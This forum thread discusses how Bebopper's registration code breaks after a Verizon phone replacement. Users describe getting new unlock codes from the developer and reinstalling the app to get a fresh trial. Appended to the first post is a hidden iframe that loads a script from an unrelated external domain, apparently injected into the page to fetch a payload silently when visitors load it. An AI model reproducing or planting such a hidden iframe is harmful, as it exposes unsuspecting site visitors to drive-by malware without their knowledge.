+ Reply to Thread

Bebopper w/ phone replacement

I just got a replacement phone from Verizon. It seems that the registration code is tied to the device ID rather than the hotsync ID used with other software.

If you have Bebopper and you get a new or replacement phone the reg code may not work.

I e-mailed Jonathan Bell regarding this situation, and will post his answer.

Until then, if anyone knows a fix, please let me know - I needs me tunes.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just replaced my phone at Verizon and noticed the same thing, my Device ID was now slightly different. I emailed Jonathan about it, and he sent me a new unlock code right away, and now it works fine again.

By the way, until you get your new unlock code, if you delete and re-install Bebopper, you will get it to work on a 21 day trial. then you have some time before your new unlock code comes in

I got a quick responce from JB as well, -with a new code.

I realize that the developer is trying to protect his efforts (and rightfully so), by eliminating potential theft by persons that do not buy his software, however, I don't feel that legit people that pay and register for the product should have to go through this process just because they get a replacement phone. What if Mr. Bell was on vacation, or unavailable ....

Mr. Bell did note that future versions may resolve this issue.